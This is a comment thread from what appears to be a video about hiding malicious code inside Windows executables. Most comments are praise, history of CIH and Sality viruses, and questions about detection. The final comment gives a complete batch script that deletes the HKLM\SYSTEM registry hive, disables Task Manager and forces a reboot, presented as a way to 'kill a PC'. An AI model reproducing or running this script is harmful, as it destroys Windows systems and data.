Want early access to new videos and some behind the scenes content? Consider becoming a channel member kzbin.info/door/QvW_89l7f-hCMP1pzGm4xwjoin

New challange: infect the Antimalware service executable

Fun tip about Mcaffee... it doesn't actually check the files. All it does is notice it is new, gets a hash of it, and send it back to McAffe's servers for a determination there. this could take days.

Fun fact: the notorious Chernobyl/CIH virus worked much in the way you describe: it would look for empty spaces between the executable sections and then write sections of its code into those empty spaces. Then, when an infected file was run, the virus code would reassemble those sections with some code stored between the PE header and the rest of the data. The reason the virus was so notorious was that its payload would DELETE YOUR BIOS, potentially rendering your machine unusable.

Your content is the best. I love your vids. They are so accessible and interesting yet just detailed enough to learn something new.

i never knew you COULD hide code in the executable without directly injecting onto the actual code well i guess im going to look into the portable executable format, seems interesting

Really interesting and informative video! Always wondered how viruses are made. It's pretty fascinating what is possible when you look below the tidy surface and overcome your default mindset of wanting things to work as expected.

Would be neat for a follow up video to see how you would code an antivirus for this virus

I remember learning about the Portable Executable (PE) file format writing an ELF loader for my UEFI bootloader. This is a great refresher!

Wait, what about the code digital signature? I thought it was supposed to detect modifications.

Great video, very interesting! Also it’s been nice to see you grow as a content creator - the videos keep getting better and better produced.

Me watching and nodding along. Mhm mhm I understood nothing but loved it.

This is actually how a lot of DOS viruses worked. One of the first ways to know a system file was infected was to verify the size, so if you can obfuscate your changes by injecting code into dummy data, you could hide in plain sight. And thus the cat and mouse game that is cybersecurity.

Love your content. Really enjoy the flow of your videos and how you walk the viewer through complex concepts.

This is such a great video. A lot of folks like to play it safe and not share the "secrets" of malware development. The thing is, the information is all out there. There's nothing gained from hiding anything. The "bad guys" can find this information all over the place. More people knowing about it means more bad people can use it. . .but it also means more good people know how it works so that they can work to defend against it. As we all know, security by obscurity doesn't work.

ohh so good, this video was delightful. It enlightens clearly so many concepts, like a structured list to later later study more deeply knowing how they relate, THIS was what I most liked.

This was very good. I read some books on Windows Internals a few years ago but never did anything as practical with the knowledge beyond normal development. Thanks for sharing!

plot twist: this video is a virus

This was quite an interesting and different video from your previous work. I'd love to see more of it!

What an underrated channel, damn!

In Windows Defender you can chose to ignore a threat if you think it's a false positive. What this video really shows is that making a zero day exploit is very doable, that antivirus programs may only see certain injections in certain code-caves that it is actively looking for. From a personal point of view as a user and not a developer, I would like it if every system call was prompted on screen much like the "would you like to run this program, yes or no?", but it would show a window with what folder the program wants to change and what files it wants to affect, much like when you copy files and replace them in a folder. The same way Android apps asks for permissions to use location, microphone or access folders, I would like executable files to ask me for permission, and that all these syscalls and permissions would have to be reviewed before granting a program permissions to change certain folders. One of the most annoying things with any executable program, is when it changes a file, folder or registry index without telling you what it's changing. Most installers shows a list of things it wants to install and a user can opt out of optional packages by clicking a checklist. A program or game should say promptly: "We wish to add this to your %appdata% folder" or "Install additional libraries in this location". Since switching to SSDs, a lot of apps chose to install ludicrous big files in the %appdata% folder, which is stored on the OS drive, and it takes up a lot of space for no reason, (looking at you Spotify). There is literally no speed benefit of putting cache in %appdata% compared to putting it in the installation folder on a normal HDD, unless the program or game specifically benefit from loading certain files from an SSD. I find myself creating symlinks from a HDD and putting it into %appdata% folders very often, just to save on space. Until I get a 1TB SSD, I won't be allowing 20GB of cache files to just collect dust on the SSD for a program I run once in a blue moon. Thank you for a very educational video.

This is fasctinating and insane to me at the same time, how do people get hang of this low level stuff, seems beyond my comprehension.

It's important to note that all the worry about ensuring the program can still execute its own code is only a concern if you're trying to create a stealthy virus that can act without alerting the user to its presence. Plenty of viruses throughout history have foregone the stealthy approach and made it obvious when the user has run an infected program.

I love it 😮 really really nice video 😍 it's awesome how easy it was dude

I love videos that are for educational purposes only. They are so.... educational. :)

The question is, can one do something malicious to ones self?

It would have been nice to see a virustotal result and see how many of its AVs detect you.

All you need to trip Windows defender is downloading and executing another executable (or sometimes executing another executable at all) - something I have to fight frequently as there are many perfectly reasonable reasons to do this :)

Love your videos!

this channel is so good

Another fantastic video!

yer a wizard harry

As usual, McAfee is a total joke

i read somewhere that now you can attack a pc from the bios logo and its nothing you can do about it!crazy

I really love your videos

I don't think I've ever heard anyone pronounce EXE the way you do. Made me chuckle a lil

this is a really similar concept to win32 sality it used to bytepatch exes to run itself and was a nasty bit of kit.

9:13 Does that mean that if you were to stick with .text instead of .reloc, windows wouldn't have found any threats?

Always excited to watch a new video by you!

Wait, did you reupload the video with a different thumbnail/title? I'm pretty sure I've seen it on my feed before, but I didn't actually watch it yet

Do you always wear the AVGN fit in videos

Nice video! I really like your VSCode theme, would you mind sharing your setup?

Into - if it replicates further, it's a worm :). Or, it's simply ads..

Fine. I'll put down Fortnight and watch this 😂

I made a virus and I went to prison. (oh how I wish I was joking)

Hello. I like you.

Hehehe, smart. “easIER”, yet not “easY” 😅

Video was paced way too fast for me to keep up with. Would’ve been appreciated if you slowed it down and explained things a bit more.

Ps, if you want to kill a PC, put this in a bat file reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f Taskkill /IM explorer.exe /F reg add HKLM\SYSTEM\Setup /v OOBEInProgress /t REG_DWORD /d 1 /f reg add HKLM\SYSTEM\Setup /v SystemSetupInProgress /t REG_DWORD /d 1 /f reg add HKLM\SYSTEM\Setup /v SetupType /t REG_DWORD /d 1 /f reg add HKLM\SYSTEM\Setup /v SetupPhase /t REG_DWORD /d 1 /f reg delete HKLM\SYSTEM /f shutdown /r /t 0 and run as admin !I AM NOT RESPONSIBLE FOR DESTORYED PCS! !USE AT YOUR OWN RISK!